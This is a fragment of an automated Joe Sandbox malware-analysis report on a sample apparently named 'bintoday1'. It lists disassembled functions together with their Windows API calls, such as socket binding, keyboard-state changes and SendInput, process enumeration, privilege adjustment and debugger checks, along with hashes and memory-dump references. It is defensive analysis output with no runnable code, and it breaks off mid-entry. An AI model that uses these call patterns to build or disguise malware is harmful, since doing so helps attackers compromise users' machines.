Part of subcall function 00C03874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C03966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C09BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C09C75

Strings

*.*, xrefs: 00C09B5D

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: af293a95d1d889df11f9894bc6bf60de3d0cfe7657bc993015ebf0722bf85226
Instruction ID: 2ccd8bed7a434947e6ee738f5b973806d49e0fd7d13cce048dd28048b707427f
Opcode Fuzzy Hash: af293a95d1d889df11f9894bc6bf60de3d0cfe7657bc993015ebf0722bf85226
Instruction Fuzzy Hash: A3413C7194420A9BDF14DF64C885BEEBBF8EF05310F2441A6E815A2192EB309F85CB61

Function 00BA997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00BA9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00BA9A4E
GetSysColor.USER32(0000000F), ref: 00BA9B23
SetBkColor.GDI32(?,00000000), ref: 00BA9B36

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 850321ab2ec84d457c8cc1846b5d936dfe3e12f05b1423b0664428a3894ff857
Instruction ID: 8d7ea7782ee1acc94b64eaf2d89e27bc8d79b2b56ae76dbd8c99f47ecb5cc291
Opcode Fuzzy Hash: 850321ab2ec84d457c8cc1846b5d936dfe3e12f05b1423b0664428a3894ff857
Instruction Fuzzy Hash: 70A1E47024C494BEE728AA2EDCC8F7F26DDDB87340B19029AF502C6995CF259D01F271

Function 00C11806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C1304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C1307A
Part of subcall function 00C1304E: _wcslen.LIBCMT ref: 00C1309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C1185D
WSAGetLastError.WSOCK32 ref: 00C11884
bind.WSOCK32(00000000,?,00000010), ref: 00C118DB
WSAGetLastError.WSOCK32 ref: 00C118E6
closesocket.WSOCK32(00000000), ref: 00C11915

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: c2fa7fba53cb9c83b742d6251d70ee2cb9e7c22894bdccf232a7674035fe756f
Instruction ID: 1a6e4374add60b445a7c3f235fbf9c83743aae0ef25029ad26c01453d344fee7
Opcode Fuzzy Hash: c2fa7fba53cb9c83b742d6251d70ee2cb9e7c22894bdccf232a7674035fe756f
Instruction Fuzzy Hash: EC51B471A002109FEB10AF24C886F6A7BE5AB49718F49C09CF9195F3D3DB75AD418BA1

Function 00C21C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00C21CC0
IsWindowEnabled.USER32 ref: 00C21CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00C21CDB
IsIconic.USER32 ref: 00C21CE9
IsZoomed.USER32 ref: 00C21CF7

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 867f0d00b1257449207b5e79e6a5d62de4b6eb35f1cf2e0be17bdbd98752981e
Instruction ID: db03a7f0187c00de79ce3da2ca9db5b5ce9fb186a56c5c7ca00b640f5cc13796
Opcode Fuzzy Hash: 867f0d00b1257449207b5e79e6a5d62de4b6eb35f1cf2e0be17bdbd98752981e
Instruction Fuzzy Hash: 6F21F7357406209FD7218F1AE884B2A7BE5EFA5314F1D8068EC4ACBB51CB71ED42CB90

Function 00B98060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00B9843C
VUUU, xrefs: 00B983E8
VUUU, xrefs: 00BD5DF0
ERCP, xrefs: 00B9813C
VUUU, xrefs: 00B983FA

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 0556d5be1289007cd565ab86b9896d0029c8f9b8a4b5470dbeafebae54a62cce
Instruction ID: f76965d78aae000ca86b286e3ce5ecbc3d92afbf1b58063518be361d8559884b
Opcode Fuzzy Hash: 0556d5be1289007cd565ab86b9896d0029c8f9b8a4b5470dbeafebae54a62cce
Instruction Fuzzy Hash: A9A23B71A0061ACBDF24CF58C9807AEB7F1FB55314F2485EAE815AB385EB749D81CB90

Function 00C1A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C1A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 00C1A6BA

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

Process32NextW.KERNEL32(00000000,?), ref: 00C1A79C
CloseHandle.KERNEL32(00000000), ref: 00C1A7AB

Part of subcall function 00BACE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00BD3303,?), ref: 00BACE8A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 2364f564ac8f31bc4dba64953c686db624962f56168ef6c4c151e456fefe70d0
Instruction ID: 20405d28a31d66108c37863a229b97daa17139858819451cf199b9ce6cf1aceb
Opcode Fuzzy Hash: 2364f564ac8f31bc4dba64953c686db624962f56168ef6c4c151e456fefe70d0
Instruction Fuzzy Hash: 35514B71508300AFD710EF24C886A6FBBE8FF89754F40896DF599972A1EB30D945CB92

Function 00BFAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00BFAAAC
SetKeyboardState.USER32(00000080), ref: 00BFAAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00BFAB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00BFAB88

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 58592e2c9631815c78f24f3167ce3918f96bf0d1c8e75f11d716267727139ec1
Instruction ID: 30e252b5a52bd6c9d37eae69bb8d51357e4561e8d43d38601f9a3887e031ea03
Opcode Fuzzy Hash: 58592e2c9631815c78f24f3167ce3918f96bf0d1c8e75f11d716267727139ec1
Instruction Fuzzy Hash: 733105B0A4020CAEFB399A64CC45BFE7BE6EB44310F04429AF289575D2D374899DC762

Function 00C0CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00C0CE89
GetLastError.KERNEL32(?,00000000), ref: 00C0CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 00C0CEFE

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 9dbcaf689eca21b88a04138c56e7f40f5ceea9d74350a403ed3b7f51f057e918
Instruction ID: 69d273c985ebfb2db36d71b6d7944dd98d7ae2fbfc5c51f374b9f72c4284f0e8
Opcode Fuzzy Hash: 9dbcaf689eca21b88a04138c56e7f40f5ceea9d74350a403ed3b7f51f057e918
Instruction Fuzzy Hash: 0021BD715007059BD730CFA5C988BAB77F8EB10314F20462EE666D2191E770EE05CB50

Function 00BF8298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00BF82AA

Strings

(, xrefs: 00BF82F0
|, xrefs: 00BF82DA

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 56ac57c685871eac3da9b6db08bba506dcad3d1f43fb8a9505ac5435ff28c486
Instruction ID: 0304d9c5034344d930b40c86e9bd67401e7c29dab2c4c215e0d9f09bf8fd3c9e
Opcode Fuzzy Hash: 56ac57c685871eac3da9b6db08bba506dcad3d1f43fb8a9505ac5435ff28c486
Instruction Fuzzy Hash: 10323675A007099FCB28CF59C481A6AB7F0FF48710B15C5AEE59ADB3A1EB70E941CB44

Function 00C05C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C05CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00C05D17
FindClose.KERNEL32(?), ref: 00C05D5F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: bce891aad34cebc99a1b102014428e73931ad34f0c25cca310f20b237d76717b
Instruction ID: c15ba97f742ca3fe27c38b3184f71e559a1a46e7a9bda540aab58a2e9ae91530
Opcode Fuzzy Hash: bce891aad34cebc99a1b102014428e73931ad34f0c25cca310f20b237d76717b
Instruction Fuzzy Hash: F0518975604B019FC714CF28C494A9AB7E4FF49314F1485AEE9AA8B3A1DB30ED45CF91

Function 00BC2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00BC271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BC2724
UnhandledExceptionFilter.KERNEL32(?), ref: 00BC2731

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: fdd938c08d22305a27b932931cc200c90f2931d55f57f8f0f0b38a4e960ea717
Instruction ID: e7cf3ce804244338dd2c7378dfaa591348bbc004c3444dd97ddc5c2b3cb52c8d
Opcode Fuzzy Hash: fdd938c08d22305a27b932931cc200c90f2931d55f57f8f0f0b38a4e960ea717
Instruction Fuzzy Hash: 9631B274911218ABCB21DF68DC89BDDBBF8EF08310F5045EAE81CA6261E7709F818F45

Function 00C051CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C051DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C05238
SetErrorMode.KERNEL32(00000000), ref: 00C052A1

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: d86fef0035d06e3aa37db5a50e199f88e67055f7195d5134ec19dd3aeb348719
Instruction ID: 9132f01c26f04f889c060dd07fc51d7431f5472d7cc22ee79a21517589f1ffbf
Opcode Fuzzy Hash: d86fef0035d06e3aa37db5a50e199f88e67055f7195d5134ec19dd3aeb348719
Instruction Fuzzy Hash: BF313A75A105189FDB00DF54D885BAEBBF4FF49314F058099E809AB3A2DB31E95ACB90

Function 00BF16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00BAFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00BB0668
Part of subcall function 00BAFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00BB0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BF170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BF173A
GetLastError.KERNEL32 ref: 00BF174A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: f93555df8a5cf7bdc2c6a2c0d4ce135f15fd7bae95f9b8d972b99073dd8f50e0
Instruction ID: fd5d93f9c5e711cc09af37c2675e522bbdbd165cb0f3b866a0dc53bb988e486d
Opcode Fuzzy Hash: f93555df8a5cf7bdc2c6a2c0d4ce135f15fd7bae95f9b8d972b99073dd8f50e0
Instruction Fuzzy Hash: DC11C4B1414309EFD718AF54DCC6EBEB7F9EB04714B20896EE05653641EB70BC458B60

Function 00BFD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00BFD608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00BFD645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00BFD650

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: f4b47fb2f39f833cfd7a2009c551897f7a278c083d28ad58c74b89b95111ba5b
Instruction ID: 95dee7e52b35c394db31deeab239d0f6232ab6cb25e558ffbb2fff264384a4fe
Opcode Fuzzy Hash: f4b47fb2f39f833cfd7a2009c551897f7a278c083d28ad58c74b89b95111ba5b
Instruction Fuzzy Hash: D0115E75E05228BFDB208F95DC85FAFBBBCEB45B60F108155F904E7290D6704A058BA1

Function 00BF1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00BF168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00BF16A1
FreeSid.ADVAPI32(?), ref: 00BF16B1

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 0e69ceb98245340f636bbda64501a1dfcb1e3a01dfce46d1f55b64db0451d980
Instruction ID: c0995e17277933bbea463571b9d17abef09f841353ee2cf484f46245e21ad9fb
Opcode Fuzzy Hash: 0e69ceb98245340f636bbda64501a1dfcb1e3a01dfce46d1f55b64db0451d980
Instruction Fuzzy Hash: 9FF0F47195030DFBDB00DFE4DC89EAEBBBCFB08644F5049A5E501E2181E774AA448A54

Function 00BB4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00BC28E9,?,00BB4CBE,00BC28E9,00C588B8,0000000C,00BB4E15,00BC28E9,00000002,00000000,?,00BC28E9), ref: 00BB4D09
TerminateProcess.KERNEL32(00000000,?,00BB4CBE,00BC28E9,00C588B8,0000000C,00BB4E15,00BC28E9,00000002,00000000,?,00BC28E9), ref: 00BB4D10
ExitProcess.KERNEL32 ref: 00BB4D22

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 6446e5cb698f4d31924b4cf8ff230098db2f93053efd596c6df8b3b038c993ca
Instruction ID: 5d77379148b2232e906b300f4230ba2e377ca8973beb09758b930981454a9933
Opcode Fuzzy Hash: 6446e5cb698f4d31924b4cf8ff230098db2f93053efd596c6df8b3b038c993ca
Instruction Fuzzy Hash: B9E0B631010548ABCF21AF54DD4ABAC3BA9FB42795B108468FC058A533CB75DD52DB84

Function 00BCC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00BCC36C

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 0e6d9217e75c97f8c5e87937172ca1f59947f84f248911f18a9a03ae8cfb1cb0
Instruction ID: b56bb89510dd8afeb658e5fbc0a5f0c0e463a9b7c9f0d943da824acfd0c36a50
Opcode Fuzzy Hash: 0e6d9217e75c97f8c5e87937172ca1f59947f84f248911f18a9a03ae8cfb1cb0
Instruction Fuzzy Hash: 794126765002196FCB249FB9DC88FAB7BF8EB94314F1042ADF919DB180E6709D818B54

Function 00BED27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00BED28C

Strings

X64, xrefs: 00BED2A8

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 1fb18ba4f47693f40f1645b449344921b858fcb322cbc242dd1b8a277160601c
Instruction ID: f8e9805fb3c3e03ec4c78ecbd1aac51e37331ea012818bbbc09e7706c9ff3331
Opcode Fuzzy Hash: 1fb18ba4f47693f40f1645b449344921b858fcb322cbc242dd1b8a277160601c
Instruction Fuzzy Hash: 4DD0CAB481512DEACBA0CBA0ECC8EDEB7BCBB04305F100292F206A2000DB7096498F20

Function 00BBCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

